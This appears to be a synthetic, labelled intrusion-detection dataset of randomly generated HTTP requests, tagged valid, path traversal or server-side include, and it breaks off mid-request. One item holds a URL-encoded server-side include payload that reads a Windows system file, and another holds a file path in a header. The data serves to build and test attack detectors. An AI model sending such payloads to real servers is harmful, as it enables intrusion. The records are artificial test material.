class: Valid
GET /asue/aIf_..kGDI/d3M4jz/2QnaEptipiuiso/r2TvCxptbJ3TULFD@/aaesteb7shsnxetia/tYpXjaR/n9.bin?eitcg=478757&st=6506741&pi54gai8=9aS1ttldtneieNy1b&roahnhbh=2absu+i+rheeapasswddnodetephp&nvsnutnx1tObJsI=thps9ds1ndhriobnhc HTTP/1.1
Host: 223.207.45.199
Connection: nhn2ddib
Accept: */*;q=0.2
Accept-Charset: cp-932, euc-cn;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 91.136.93.17
Cookie: iex=58460828;Jhiphpof3Qcopy=ds1ciju+bchildle;dnsaes6oibez=nadeHmrsrjrnti;7nmg=3eael;s2sm=eopted
Cookie2: $Version="25"
Date: Tue, 16 Aug 05 21:25:34 UTC
ETag: W/"iwoQ954Ux3XociSacO"
Expect: 100-continue
From: ruf6nI@0Dnp.be
If-Modified-Since: Wed, 24 May 06 14:10:44 CET
If-Unmodified-Since: Wed, 09 Mar 05 05:01:23 GMT
If-Match: "@g04Igg8Vq6r1fCpqW."
If-None-Match: *
If-Range: Thu, 31 Jan 08 15:04:01 UTC
Max-Forwards: 3927
MIME-Version: 0.8
Pragma: snb2dwr=een
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Digest cnonce="lrlmlld"
Range: -628836,202688-,60495-
Referer: /5nnhttlL/Toke/Nuea.jsp
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.1 (X11; U; Unix 8.1; nH-t7; rv:8.2.0) Gecko/35482813
UA-CPU: PowerPC
UA-Disp: 4451,828,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 537x415
Via: 3.8 www.uhon.shtml, 5.2 84.73.46.58, 8.4 www.ecnev.html
Transfer-Encoding: gzip
Upgrade: phk/2.7, wyt/2.3, aceH/6.7, E0oom/2.2, 0rtr/0.0
Warning: 525 237.102.27.124 "s17tooevait4Le" 
X-Forwarded-For: 167.169.89.86
X-Serial-Number: 94210
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 320
Start - Id: 17900
class: Valid
GET /inttp/0eX3iMfromhyltevalbzeval/peHshjefnirhskCttpt/tin8keetsekasz/nT2CCRO8SZPERWPyFX.mdb?Sln=%3C%5CNgo&uhnebdnv6v6tdw=3&Ehnnrhhaxasuoe=o7n1stdinv HTTP/1.1
Host: 57.138.212.5
Connection: ua6r8
Accept: image/gif;q=0.1, image/*;q=0.8, video/*;q=0.0
Accept-Charset: cp-950
Accept-Encoding: deflate, identity;q=0.5, gzip;q=0.0
Accept-Language: Jlee-urtln7in;q=0.5, ihwj1-slAirbft, uoojw-esh;q=0.0, eameen-i
Cache-Control: no-transform
Client-ip: 90.81.217.94
Cookie: uwy87ensq7vatqt=8xoioxei
Cookie2: $Version="10"
Date: Sat, 17 Jan 09 06:56:25 CET
ETag: W/"rawowBGsxwOeMNHwDQD"
Expect: shernS8
From: rdny@hctpuostk.cz
If-Modified-Since: Tue, 29 May 07 08:09:15 CET
If-Unmodified-Since: Mon, 08 Feb 10 10:49:48 CET
If-Match: "fKtB.5VUBzV_@ObM"
If-None-Match: "oT5p0gcHLmo3agk"
If-Range: *
Max-Forwards: 36
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dGV0ZUk6ZGxpdg==
Authorization: aahT fAd7=onn2sth
Range: -299
Referer: /hoedYQI.wav
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/0.2 (compatible; Konqueror/4.2; WinNT; Meaayg; rqlinh)
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: 1.3 www.nnib.js, 7.8 163.211.247.172, aes/3.9 www.d10i.jpg
Transfer-Encoding: identity
Upgrade: tigP/7.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 4786268
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17900
Start - Id: 44633
class: PathTransversal
GET /akdrop63FL09vENuDy/oC18MHLCaESPrqnFMbAo/2orrtpkjjtl33er/EW31uf/s9excnw5E1e5sxhLessg/gbwa2t1awlhnhsaciv/srmrco/auj-Q1lJcV/ote4cexdefjoJ5jnL/vne6rf/aawmeaeT.jpeg?omailVrstylem=2971&nogRdi=oVAMYZ&xegazcysn0bD7tm=ot96dcdcOosmlla4&s1thnph-o=1605747 HTTP/1.0
Host: 21.121.20.218
Connection: btmb0o
Accept: */*
Accept-Charset: iso-8859-1
Accept-Encoding: gzip;q=0.7
Accept-Language: file:///p:/S7td/i5sr/Oftrcai.xml
Cache-Control: min-fresh=3820
Client-ip: 95.91.76.121
Cookie: kdr5gM4mAfpogsh=391450525;tl=lo3r7DeT;ptOatts=uktopenor;4DZskIL4B=716110;V54-WRS=69391
Cookie2: $Version="462"
Date: Sun, 19 Dec 04 18:55:05 CET
Expect: 100-continue
From: fsdIshc@oassmaqEaj.fr
If-Unmodified-Since: Fri, 14 Nov 08 01:23:31 UTC
If-Range: Sat, 29 Nov 08 04:39:01 GMT
Max-Forwards: 7398
Pragma: q=iv9iy
Proxy-Authorization: Basic ZXVibmw6dGVybnI=
Referer: http://eTavheos.uk/aHee.mdb
TE: trailers,chunked;q=0.6,trailers
User-Agent: Mozilla/4.4 (compatible; Konqueror/9.2; Open BSD i386; hila; esfhaidnEd)
UA-OS: FreeBSD
Via: 6.4 225.28.156.119
----: ---------------------------

null

End - Id: 44633
Start - Id: 15825
class: Valid
GET /ZIzT3m5Bp/mMj_xHh/exh_tmexecu/tye6fftuamhtn/tnnetcynAv/aGccopy.K_eNsystem6E/b7rH4/65gG27CcZ@A1OE-/tttntne/rnyr3rv/nao0ieNfhfffsrhN/tTM.sh? HTTP/1.1
Host: 101.146.102.194
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1254, iso-8859-4, utf-8;q=0.9
Accept-Encoding: *
Accept-Language: awaW-hc;q=0.8, tgtedhS-titRdqDb;q=0.3, iNwont-str, zh-f
Cache-Control: no-transform
Client-ip: 97.141.13.193
Cookie: litathLdtl7spil=aaemsabifhsoni;nm=2;bue3gnrqMitidse=t4raluftsied;sznsma=o eBsptolA2%;7Eaovmvd6csmrp=7are3tfSttviJt;tVWWlike4xidJ=h33F_U
Cookie2: $Version="7"
Date: Fri, 07 Sep 07 18:17:51 GMT
ETag: W/"wekDEP9BblzzHtXV49"
Expect: 100-continue
From: garo@oerqtZ.st
If-Modified-Since: Mon, 03 Aug 09 22:52:32 UTC
If-Unmodified-Since: Fri, 17 Jun 05 06:33:27 CET
If-Match: *
If-None-Match: "sHiKJD13ZVVJjWD@L"
If-Range: Sat, 19 Dec 09 07:09:24 CET
Max-Forwards: 8
MIME-Version: 6.0
Pragma: ft5l=g
Proxy-Authorization: Digest username="0nSl"
Authorization: NTLM b2hlaHB0bjRoUmxlbVc4cXVlYXlpbmluc2Vob0FzRXdyZWVuZWQ3aTh2dE53ZEU=
Range: -630,9-,363-
Referer: http://www.eralsi.ch/lusonc.txt
TE: gzip;q=0.2,deflate
Trailer: Max-Forwards
User-Agent: PanHreJoaa8h
UA-CPU: 68000
UA-Disp: 3222,4414,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 132x8371
Via: 7.9 www.fadi.js, 3.0 188.42.193.190, 8.3 www.Dntuneea.jpeg:14
Transfer-Encoding: compress
Upgrade: tnsap/4.9, hb3i/7.3, teoa/7.0, yetn/8.3, dof/3.7
Warning: 193 www.losl.png "jmxogwrexo6" 
X-Forwarded-For: 10.118.64.124
X-Serial-Number: 6066558353005235
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15825
Start - Id: 9958
class: Valid
GET /rS/rse/fR13iciA/y@8_M_D9servicesNq0c.tiff?bn2=cf45-qxAtha&qacte=9815055&nri1=areSlhnxesdtw&nnOsae=6&euueveisaa8ge0P=OhazNuzav&xamilsovp=ouni2IVd&aqol=sdqh7imtahdjdh&10NlIP=naOute&s2AoeEidmyn=f6rDuasa8ie%24servicesB&kqgpteios=m%27SJxb&5v93passthruDAcxreplace=367074493&eyuwTcu=04530439&2lrsnAtthtr=fNDWN%400ejGC HTTP/1.0
Host: www.mcmAeHrnge.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 165.254.179.149
Cookie: fdur=l3 UtoNr;son2cW=7
Cookie2: $Version="573"
Date: Fri, 23 Jun 06 08:58:22 UTC
ETag: "PUflyuOYPUtmFuwJnsOF"
Expect: 100-continue
From: aieare@emLw.be
If-Modified-Since: Thu, 29 Nov 07 11:34:58 UTC
If-Unmodified-Since: Sun, 02 Aug 09 13:26:24 GMT
If-Match: "esqB6rJIKT3HRXw6AJ1"
If-None-Match: "gGPT2neMcKFpP1wFMzL"
If-Range: "qXykQRUnNrnscKbB"
Max-Forwards: 197
MIME-Version: 9.2
Pragma: tnrlghfi=e
Proxy-Authorization: Digest nonce
Authorization: Basic Rm9pb0lsODp6aHNvNQ==
Range: -96
Referer: http://www.6dcSnL.st/nbe2sfe.doc
TE: chunked;q=0.1
Trailer: If-None-Match
User-Agent: df_ptJA http://www.VCet3.com
UA-CPU: 68000
UA-Disp: 042,750,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 596x007
Via: HTTP/2.0 www.xe8zsyL.js, dte/6.0 www.aihr.htm:35
Transfer-Encoding: deflate
Upgrade: EIecm6/9.9, iperio/2.0, nea/8.0, testdg/7.3, TvsW/8.2
Warning: 614 www.ybpt.js "ithwrochasw4rgehd" 
X-Forwarded-For: 36.77.211.44
X-Serial-Number: 939778978647707
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9958
Start - Id: 13037
class: Valid
GET /oznsdPYGEZ6zi/aJ2deleteNobjectexecnetcatVpl./w22l1XpEy97BEhCHZ80/h2gUTXpY0TI.qFSX/ettuyS/m_cmZ9/MinsertW/tkstsmlsnDtE/ggQLz@bPi/passthruklGNmH-tfJH8/99wgetB.shtml?emT6o8hAOiTh4h4=etSshOoerm84nhm&jTakthu=ldi&riouew2iil=95408&Ea_KevalRE=roU4ch9&8tana0=905&elttucld=4&aaadcgw8nTn7=esYy2bv9kW&E3dp=%3EorctioatDl%29hiar3c&Yldu=4&Oe4zg=aknkd8wstln9&Sppastooe=tnncr%29hdeletecowp-T4passwderbt%3Fh&allkR0dvVQimgmochaNs=385300217 HTTP/1.1
Host: 100.124.188.96
Connection: close
Accept: text/*, text/*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: AnWzE1r-lehn;q=0.3, vnt-T96fzegp, a-a;q=0.9, ite9M-c9;q=0.0, eafn-wol;q=0.6
Cache-Control: no-store
Client-ip: 82.22.221.79
Cookie: @WX4=566513;imoahjne9atesf=07306781;utr=2074309624
Cookie2: $Version="923"
Date: Tue, 25 Sep 07 17:20:58 UTC
ETag: W/"OKmEAzboWCMrzGY"
Expect: eptntiDy
From: isn1r@lopp9e.fr
If-Modified-Since: Fri, 19 Sep 08 03:57:56 GMT
If-Unmodified-Since: Mon, 27 Dec 04 08:52:54 GMT
If-Match: "kB5FkGc9dA3Pjp6c80"
If-None-Match: "jqYTFsqmXCPtBAu-tf2W"
If-Range: Sun, 19 Feb 06 12:04:11 CET
Max-Forwards: 86
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bkdhaHVobGVzdndsZXZzZnVlU3NhZWd0ZWkxeXhpNWVuWnlhaHJpajlzbA==
Authorization: Digest opaque="aaTndh"
Range: 309-6,-2
Referer: /oeRzfgl/91axr.avi
TE: trailers,trailers,chunked;q=0.8
Trailer: Expect
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 9.2; td-1l; rv:0.9.6) Gecko/26498283
UA-CPU: x86
UA-Disp: 5331,978,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 011x9947
Via: yloa7a/1.2 163.123.246.41
Transfer-Encoding: identity
Upgrade: uede/9.7
Warning: 255 101.108.66.228 "edon2hsulniorc" "Sun, 25 Sep 05 11:05:11 CET"
X-Forwarded-For: 28.63.48.40
X-Serial-Number: 72290
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13037
Start - Id: 23761
class: Valid
GET /GfuTo/ozax6lL/nxOAj0DahqV_n/oecdwp0s1tvAm/hwehric/e7eawtieetaPdtti/eOu/e0mj/F2Vm8tTUE.jpg?fwdocumentxVy49=11013&tytmsr1prl=erareanm&lsitatelen2e=y%2FacxTIuo-&trenn6rea=707373 HTTP/1.0
Host: www.Qrse.org
Connection: keep-alive
Accept: image/gif, video/mpeg, video/mpeg
Accept-Charset: utf-7, x-mac-turkish;q=0.0, koi8-r
Accept-Encoding: *
Accept-Language: il-hde
Cache-Control: min-fresh=627
Client-ip: 139.204.120.139
Cookie: tRIdNnntacNit=tu;ntnas4gDhuli=9;iS7uTD=eieiiNdotey;greogBrst6Ltvun=; iehinneval7wl
Cookie2: $Version="53"
Date: Sat, 11 Aug 07 03:27:52 CET
ETag: "RzlK9W2DHK5ziTY"
Expect: 100-continue
From: yiews@64sy.de
If-Modified-Since: Fri, 21 Nov 08 21:11:00 GMT
If-Unmodified-Since: Mon, 01 Oct 07 10:22:00 UTC
If-Match: "QoBLUAEP3lok0XWzKi"
If-None-Match: *
If-Range: "Tiz7MTZsIhK5pcMk"
Max-Forwards: 7417
MIME-Version: 5.6
Pragma: 5oklw8ia='faemHt'
Proxy-Authorization: NTLM ZWJJZW1mMXRhYURudGFuc1JpZml0bmFpaWhhSWUzYWw=
Authorization: Basic bGlubndzdWk6dEtleQ==
Range: 761-,-655
Referer: /oai0/Foeehll.gif
TE: trailers,gzip;q=0.0,trailers
Trailer: Proxy-Authorization
User-Agent: cDeudd9sg/0.5.7.2
UA-CPU: 68000
UA-Disp: 492,2265,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 869x955
Via: 8.1 www.msod9r.css
Transfer-Encoding: compress
Upgrade: tcj/8.9
Warning: 754 111.149.39.187 "E4v7ars1jmvnre" "Mon, 09 Aug 04 19:29:50 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23761
Start - Id: 24526
class: Valid
GET /ewsBu/lqBS/ynees/6sirsheeFlIhseseRo/tmsauXMNtbZ@fEetyZ./i57V4V./q23NXbrZKRy/v9-kwinnt/u9zbmFcf/yZSc/iQ23rXZAJ4RNE3w73Yv/bhEtse.jpeg?banjetigoehnch=sr+rinw%3A&Lv0r3Qa=2795872859&seoe=tsi7hlyecayrpyTtii&pevste=aEh6thdeletevtaEu&LidhcsanwarE=-%2B6rn&Dsom=0&PttbUEnu=96565018&riGfmtcsnrt=3717&hlEh1hoh=rN4x%5D%3Cer&rciltc1fautpnr=ct4HknoOa7i&na=02846&igc88Eceib4=tit2sWtma&lriqu=cor%40 HTTP/1.1
Host: 232.237.125.138:80
Connection: close
Accept: */*
Accept-Charset: x-mac-roman, big5
Accept-Encoding: *;q=0.8
Accept-Language: err-waeetO, n-y, sbnesIp-tr, imqhrit-novkfs5;q=0.9
Cache-Control: only-if-cached
Client-ip: 106.138.49.194
Cookie: vbldnpXm=tI63moadA91;wua4sej8lqeec=w.V@6m8I06_N;sxg6jXWJ@zaccess_log=azlm3v/mhmerbnx
Cookie2: $Version="91"
Date: Tue, 26 May 09 12:24:47 CET
ETag: W/"I6sJ9XSFVjVyl8@kdxf2"
Expect: istoce
From: pzwu7iEa@yhivtK.st
If-Modified-Since: Tue, 08 Dec 09 10:31:43 GMT
If-Unmodified-Since: Fri, 06 Jul 07 01:53:26 CET
If-Match: "Gl5oJS0RbzyNcmlqeg"
If-None-Match: "bp8bfkhuy@hJCEf"
If-Range: "qtr-yURl_hTfIL7baM"
Max-Forwards: 96
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic YmNPaGdDajowYXNld3Q=
Range: -85539,4-,9083-
Referer: http://7see.biz/eeTsoat.php4
TE: trailers,chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: Mozilla/2.8 (Windows; U; WinNT 5.1; El-fg; rv:9.7.3) Gecko/21035150
UA-CPU: PowerPC
UA-Disp: 1408,616,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 303x667
Via: 1.6 www.a3FUx.png
Transfer-Encoding: gzip
Upgrade: prsuot/9.5, stt/6.8
Warning: 566 www.Xphrezsp.htm "njtsn" "Sat, 25 Mar 06 03:51:16 UTC"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24526
Start - Id: 22387
class: Valid
GET /NIk8pzE6/yeiiimssetsbdhhoxor/shouEs5tnaNiege/0F85e3/oafhguie.sh?ieSuae=ak+&a1iitvjosbz=9370690&XeagoniaalE25te=o+o%25&ACDVTAy=lwyor%3B&6rDfhltbhr1qfee=iU+g&aei=ov-sh5K HTTP/1.1
Host: 151.66.72.230
Connection: gomithee
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 189.228.119.233
Cookie: eel=9;cntltness=nHcdBtED8;stkatqntiwozn=205791;eeydwnIgmt9a=a@p i  autoexec';sknf3an=lDu3tqp0un
Cookie2: $Version="985"
Date: Sun, 18 Jan 09 19:03:17 GMT
ETag: W/"Y5RGtFB@yPNp@.6@drPI"
Expect: mehpgn
From: 1eNTR8ie@q3cs.biz
If-Modified-Since: Fri, 12 Jan 07 24:47:16 GMT
If-Unmodified-Since: Tue, 26 Jul 05 20:21:49 UTC
If-Match: "xSEx_6fIgNyNB9FA5F"
If-None-Match: *
If-Range: *
Max-Forwards: 13
MIME-Version: 2.1
Pragma: 6ea='tye'
Proxy-Authorization: rnic hovsi9ai=hhcDiun8
Authorization: Basic ZWFpdExlYXQ6c29lTUQ=
Range: 27-495
Referer: http://iaot.net/oosnnaoa/aeoiu9a/riadz/asvtlgko.swf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.1 (compatible; Konqueror/9.7; Unix; iehgpaehey; btde; pleMr9ea)
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: 85zs/3.2 www.Eet4cS.jpeg
Transfer-Encoding: compress
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22387
Start - Id: 3004
class: Valid
GET /fN./iDQtkqmkjtsm6g/qFNX8BTwFLHdeHiL/scLhL6hvCFkxKH0F/aiOR7lrtdscnderEx/mAuF_w/rY01.xn5TWiyai40c6k/IweilriaEwmfinb.jpeg?trdarqthExth=sock_streamnzepcde&Oh=d_rexBo&kpoltIajhtjc=5TaD3cvL&qhya0=56766&poji=Sm&2oe=lQelA&ie=paneoocr&Bqu_nZGDgD=97&oeep4=a2etd&3vlri5ouer=mlhaccepte&et=930919359&t3ielNrhnaoe=4&oiznotwd8aeen=76013 HTTP/1.0
Host: 231.94.221.106
Connection: O3vp7sdl
Accept: video/*, application/rtf, audio/basic;q=0.2
Accept-Charset: x-mac-korean, iso-2022-kr;q=0.0, windows-1251, hz-gb-2312, iso-2022-jp;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: min-fresh=00619
Client-ip: 149.195.211.182
Cookie: ecO=88242;Ur3whyrsnn1i=Wv66c8lowronati
Cookie2: $Version="186"
Date: Sat, 19 Sep 09 07:41:53 GMT
ETag: W/"oqgI8hu-id-K1uVS4C"
Expect: aeMl=inthaoto;a7Daf=Ktraua
From: Gnrp@qqtreOp.fr
If-Modified-Since: Fri, 30 Oct 09 23:43:50 UTC
If-Unmodified-Since: Wed, 31 Aug 05 05:15:44 CET
If-Match: *
If-None-Match: "WNfspZqkw2ISPsXLG@2"
If-Range: "KKW8xdbEkcszBu4akdEi"
Max-Forwards: 44
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM dWVPc1hsN3p3c2VUc3FXaG9FdGlnd2RuZTRlVWRsdGF0Zm90b2E=
Authorization: Digest nc=eB3E76Db
Range: 420-
Referer: http://www.rRiia3lh.st/nhS3yF/es5at5/w9EnIe/swOSnrt/eMoEd.html
TE: deflate;q=0.4
Trailer: Upgrade
User-Agent: 1nux/9.5.7.5.5
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1039x612
Via: gawv/3.8 244.77.112.9, 9.2 www.sax4tlyi.jpg:85, FTP/3.2 www.otLe.html
Transfer-Encoding: oahe
Upgrade: nqsh/1.3, aaiIb/2.1, SylCe/2.6
Warning: 957 www.teI4r.tiff "iedey" "Wed, 16 Nov 05 14:19:51 UTC"
X-Forwarded-For: 191.50.240.235
X-Serial-Number: 39984855
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3004
Start - Id: 30792
class: Valid
GET /6sMb5oq7passwdA/2E7f3BIVq9/M14mZ1zDFES52GB/hitOpwiltsl/ifOrbj/sn/tx_KygmR/RLnEBXs_/mJVSXb/peikcoo/iceHThFsRomDnqn/JselectGEEf.mspx?ti=6115999&eoqt=tnOtqasy&3.k5var=a7o+&0spOevyyseo=6956&eiqituzeo=04&8seesleehiiGv=tss HTTP/1.1
Host: 114.89.227.215:79
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 187.227.5.130
Cookie: tea=2
Cookie2: $Version="55"
Date: Fri, 27 Feb 09 03:58:19 UTC
ETag: "RBWIF9S-WIUeSDrE"
Expect: rsbooe
From: gEod@e1aR.org
If-Modified-Since: Tue, 30 Mar 04 15:00:36 GMT
If-Unmodified-Since: Sun, 18 Sep 05 10:16:00 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Jun 08 20:26:18 UTC
Max-Forwards: 1
MIME-Version: 6.9
Pragma: l3='sO'
Proxy-Authorization: ieatc4 rnrbw=hcadA
Authorization: NTLM dGY0ZHR0cGthd2N0ZUhzSG9GRWJHOUVjb1RhYW50ZTM5bm0wcnM=
Range: 40-,5809-053,-843
Referer: /ciulane1/lpeem/brEe4t/Sn3a.htm
TE: gzip
Trailer: Range
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 8.4; m2-6N; rv:6.8.3) Gecko/14760658
UA-CPU: 68000
UA-Disp: 5087,659,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5335x466
Via: 3.6 237.64.52.192, thy9L/9.6 www.nRfHji.png
Transfer-Encoding: identity
Upgrade: uIT/1.8, hdv/9.8
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 277433290484890410
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30792
Start - Id: 17939
class: Valid
GET /d59tusetl6oonVodtdt/cHM3Gv9gi.cgi?rynniiih=wheretahdus%3Cnrdk3ntd%7E HTTP/1.0
Host: www.rAtncR.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.8, iso-8859-8;q=0.5, x-mac-icelandic
Accept-Encoding: 
Accept-Language: hmI-o, ayfyTiA-hg, Rrn-aoqC, A8htjeo-nMnnn, Sedne-ano
Cache-Control: no-store
Client-ip: 136.196.112.139
Cookie: XQ_9el6Ko5P=q5ovUYppdUNA;iw=gq@Sk-H@wwWO;oa4s=o8DCL;eaw6cglbret=xpI
Cookie2: $Version="9"
Date: Mon, 14 Jul 08 09:26:09 CET
ETag: "qxB3@Nz@NrSLH-v"
Expect: 5eals
From: eua3@ehkkbs.cz
If-Modified-Since: Mon, 10 Jul 06 07:15:02 UTC
If-Unmodified-Since: Sun, 27 Jun 04 04:51:51 CET
If-Match: "PXnK0z1UJqgTdyGl"
If-None-Match: "KpJ46fLJSNQoka.wM"
If-Range: "NXMgu9U3CkEfzlrg7o"
Max-Forwards: 8965
MIME-Version: 9.0
Pragma: epett5ae=ihIagtw
Proxy-Authorization: Digest nonce
Authorization: NTLM N2l0eWhleHJ0d2hzc0QxYjZ0Y2VsbWFmZTRIMGVlMDNkb25FaGVlVGVVZW9sZWVj
Range: 05-,-776516,-07
Referer: http://www.ce50rna.be/m6vy.wav
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 4.6; dx-mt; rv:3.8.7) Gecko/44483590
UA-CPU: PowerPC
UA-Disp: 5395,1752,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5744x7610
Via: FTP/1.5 www.oiodoeun.tiff
Transfer-Encoding: gzip
Upgrade: Paoi9/6.1, ret/0.0
Warning: 693 www.syfkpa.png "orntnwsqssReted3u" 
X-Forwarded-For: 58.72.123.218
X-Serial-Number: 126359960937
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17939
Start - Id: 11057
class: Valid
GET /e0_yf/aiV@mg_/fZAB1N/ngwjcPlEPa6HoFG/QYMecm/PYmT/XqK7VJ@C.shtml?Tabnk9dhneldNnc=305352&eg=1&sUqcusi=%28oo4fegroup+by+hsiieh%3Cn%29%3D&fdteira=0eoeqwindgHb6eHh HTTP/1.0
Host: 202.21.83.17
Connection: keep-alive
Accept: audio/basic, text/xml;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: compress, identity;q=0.8, gzip
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 224.189.199.226
Cookie: sszdigr7= l 4Em
Cookie2: $Version="7"
Date: Wed, 16 Apr 08 11:27:21 UTC
ETag: "5ceGnLW7Rm.THDjabofc"
Expect: qitseelh=remts
From: e9esarYc@ncTsfi.org
If-Modified-Since: Thu, 09 Aug 07 06:32:24 UTC
If-Unmodified-Since: Sun, 10 Jun 07 05:16:18 GMT
If-Match: *
If-None-Match: "Op7S5BASabSCVq6j8Ir"
If-Range: *
Max-Forwards: 9
MIME-Version: 1.0
Pragma: Zp='u'
Proxy-Authorization: aeeWg xqe5owa=r1ap5OA
Authorization: Basic ZXRzMGlkdGE6bHNvb2Zy
Range: 940539-433
Referer: http://b7tpeG.it/loohEsi/pnea.ace
TE: deflate;q=0.1,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/8.4 (Machintosh; U; PPC Mac OS X 2.9; eb-y2; rv:8.8.2) Gecko/67845563
UA-CPU: x86
UA-Disp: 0717,4017,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1068x1035
Via: FTP/1.9 79.70.171.163, neq/5.0 181.36.207.116
Transfer-Encoding: deflate
Upgrade: orc/1.6, 9fle/6.2, 08otw/8.4, Zmleef/2.9, tDi/7.7
Warning: 698 100.215.217.10 "oajheeieawececdyAtFs" "Thu, 07 Jan 10 05:01:29 GMT"
X-Forwarded-For: 42.148.64.117
X-Serial-Number: 5468318216
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11057
Start - Id: 40527
class: SSI
GET /lids2csNrp/aSzgLIjUsUDw/osrts/eD_/foada0ertia1eRh/m9jQcdelete/iroeDehrOik/mPcgSz9BwgetchildCNj0_/f9.swf?oomeeslree3eede=04694210&tsdniasc4=%3C%21--++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&sltlw0hfwe=eiscriptNedhd&diBatr3cecm=uaoSwdBpNA&heOjp5ee=tsoutallasraasgta&rne8h=0insertht&Tp=theost HTTP/1.0
Host: 102.217.17.185
Connection: tlTn
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=58
Client-ip: 109.86.93.38
Cookie: omwindutsht=52957575;dtsshcw5a=wep6p-yR
Cookie2: $Version="05"
Date: Mon, 28 Sep 09 20:44:44 UTC
ETag: "G5thXp8xs5cDE.veI"
Expect: 100-continue
From: OeTsa@undhtsdpd.it
If-Modified-Since: Wed, 29 Oct 08 04:15:30 CET
If-Unmodified-Since: Tue, 25 Jul 06 06:04:29 GMT
If-Match: "KNmMFGZTLgYgPYNxY8N"
If-None-Match: "j_EmxoFcZkfMyGY"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.6
Pragma: eawgecu=ect
Proxy-Authorization: dler dcyii=syes
Authorization: Basic SWU2Z286YW9zaXI3aWg=
Range: -112429,931-60
Referer: http://oleOmey8.cz/BtoPy/tjnuit/suep/6nsit5/eltmilnD.mdb
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Connection
User-Agent: Mozilla/6.6 (Machintosh; U; PPC 6.3; 9d-to; rv:8.2.2) Gecko/85303416
UA-CPU: Sparc
UA-Disp: 2836,7389,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3528x192
Via: 6.8 161.197.222.122:16
Transfer-Encoding: identity
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
